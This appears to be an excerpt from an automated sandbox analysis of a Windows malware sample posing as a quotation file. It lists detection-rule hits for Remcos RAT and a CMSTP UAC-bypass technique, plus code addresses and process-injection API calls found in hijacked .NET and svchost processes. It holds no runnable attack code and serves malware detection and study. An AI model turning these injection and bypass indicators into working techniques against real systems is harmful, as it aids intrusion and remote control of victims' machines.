Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION#30810.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF9C9A8 NtUnmapViewOfSection,VirtualAllocEx,	9_2_00007FFB4AF9C9A8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF9E3DA NtUnmapViewOfSection,	9_2_00007FFB4AF9E3DA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF9CA47 NtUnmapViewOfSection,	9_2_00007FFB4AF9CA47
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF9CA83 NtUnmapViewOfSection,	9_2_00007FFB4AF9CA83
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF9C9A8 NtUnmapViewOfSection,VirtualAllocEx,	11_2_00007FFB4AF9C9A8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF9E3DA NtUnmapViewOfSection,	11_2_00007FFB4AF9E3DA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF9CA47 NtUnmapViewOfSection,	11_2_00007FFB4AF9CA47
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF9CA83 NtUnmapViewOfSection,	11_2_00007FFB4AF9CA83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	32_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00401806 NtdllDefWindowProc_W,	32_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_004018C0 NtdllDefWindowProc_W,	32_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_004016FD NtdllDefWindowProc_A,	37_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_004017B7 NtdllDefWindowProc_A,	37_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00402CAC NtdllDefWindowProc_A,	39_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00402D66 NtdllDefWindowProc_A,	39_2_00402D66
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF9E3DA NtUnmapViewOfSection,	40_2_00007FFB4AF9E3DA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,		26_2_004167B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,		45_2_004167B4

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AFA4C3B	0_2_00007FFB4AFA4C3B
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF90AA9	0_2_00007FFB4AF90AA9
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF9BEE1	0_2_00007FFB4AF9BEE1
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF9BB00	0_2_00007FFB4AF9BB00
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AFA3B6D	0_2_00007FFB4AFA3B6D
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF94398	0_2_00007FFB4AF94398
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF9EE79	0_2_00007FFB4AF9EE79
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF98980	0_2_00007FFB4AF98980
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF9146F	0_2_00007FFB4AF9146F
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AFA4C94	0_2_00007FFB4AFA4C94
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF94390	0_2_00007FFB4AF94390
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF9A70E	9_2_00007FFB4AF9A70E
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF80AA9	9_2_00007FFB4AF80AA9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF8146F	9_2_00007FFB4AF8146F
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF8EE79	9_2_00007FFB4AF8EE79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF8D2DA	9_2_00007FFB4AF8D2DA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF8BEE1	9_2_00007FFB4AF8BEE1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF8BB00	9_2_00007FFB4AF8BB00
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF8DD73	9_2_00007FFB4AF8DD73
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF80AA9	11_2_00007FFB4AF80AA9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF8146F	11_2_00007FFB4AF8146F
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF94C3B	11_2_00007FFB4AF94C3B
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF8BEE1	11_2_00007FFB4AF8BEE1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF8BB00	11_2_00007FFB4AF8BB00
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF93B6D	11_2_00007FFB4AF93B6D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF989CC	11_2_00007FFB4AF989CC
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF9AE4E	11_2_00007FFB4AF9AE4E
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF8EE79	11_2_00007FFB4AF8EE79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF94C94	11_2_00007FFB4AF94C94
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF90AA9	16_2_00007FFB4AF90AA9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF9146F	16_2_00007FFB4AF9146F
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AFA9935	16_2_00007FFB4AFA9935
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF9EE79	16_2_00007FFB4AF9EE79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF9BEE1	16_2_00007FFB4AF9BEE1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF9BB00	16_2_00007FFB4AF9BB00
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF98988	16_2_00007FFB4AF98988
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF98980	16_2_00007FFB4AF98980
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AFA052A	16_2_00007FFB4AFA052A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_10017194	20_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_1000B5C1	20_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0043E0CC	26_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0041F0FA	26_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00454159	26_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00438168	26_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_004461F0	26_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0043E2FB	26_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0045332B	26_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0042739D	26_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_004374E6	26_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0043E558	26_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00438770	26_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_004378FE	26_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00433946	26_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0044D9C9	26_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00427A46	26_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0041DB62	26_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00427BAF	26_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00437D33	26_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00435E5E	26_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00426E0E	26_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0043DE9D	26_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00413FCA	26_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00436FEA	26_2_00436FEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044B040	32_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0043610D	32_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00447310	32_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044A490	32_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0040755A	32_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0043C560	32_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044B610	32_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044D6C0	32_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_004476F0	32_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044B870	32_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044081D	32_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00414957	32_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_004079EE	32_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00407AEB	32_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044AA80	32_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00412AA9	32_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00404B74	32_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00404B03	32_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044BBD8	32_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00404BE5	32_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00404C76	32_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00415CFE	32_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00416D72	32_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00446D30	32_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00446D8B	32_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00406E8F	32_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00405038	37_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0041208C	37_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_004050A9	37_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0040511A	37_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0043C13A	37_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_004051AB	37_2_004051AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00449300	37_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0040D322	37_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0044A4F0	37_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0043A5AB	37_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00413631	37_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00446690	37_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0044A730	37_2_0044A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_004398D8	37_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_004498E0	37_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0044A886	37_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0043DA09	37_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00438D5E	37_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00449ED0	37_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0041FE83	37_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00430F54	37_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_004050C2	39_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_004014AB	39_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00405133	39_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_004051A4	39_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00401246	39_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_0040CA46	39_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00405235	39_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_004032C8	39_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00401689	39_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00402F60	39_2_00402F60
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF8EE79	40_2_00007FFB4AF8EE79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF8D2DA	40_2_00007FFB4AF8D2DA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF8BEE1	40_2_00007FFB4AF8BEE1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF8BB00	40_2_00007FFB4AF8BB00
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF90D69	40_2_00007FFB4AF90D69
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF8DD73	40_2_00007FFB4AF8DD73
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF80AA9	40_2_00007FFB4AF80AA9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF8146F	40_2_00007FFB4AF8146F
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 40_2_00007FFB4AF9AB49	40_2_00007FFB4AF9AB49
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AF90AA9	42_2_00007FFB4AF90AA9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AF9146F	42_2_00007FFB4AF9146F
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AF9EE79	42_2_00007FFB4AF9EE79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AF9D2DA	42_2_00007FFB4AF9D2DA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AF9BEE1	42_2_00007FFB4AF9BEE1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AF9BB00	42_2_00007FFB4AF9BB00
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AFA0D69	42_2_00007FFB4AFA0D69
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AF9DD73	42_2_00007FFB4AF9DD73
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 42_2_00007FFB4AFAA532	42_2_00007FFB4AFAA532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0043E0CC	45_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0041F0FA	45_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00454159	45_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00438168	45_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_004461F0	45_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0043E2FB	45_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0045332B	45_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0042739D	45_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_004374E6	45_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0043E558	45_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00438770	45_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_004378FE	45_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00433946	45_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0044D9C9	45_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00427A46	45_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0041DB62	45_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00427BAF	45_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00437D33	45_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00435E5E	45_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00426E0E	45_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0043DE9D	45_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00413FCA	45_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00436FEA	45_2_00436FEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 00416760 appears 69 times
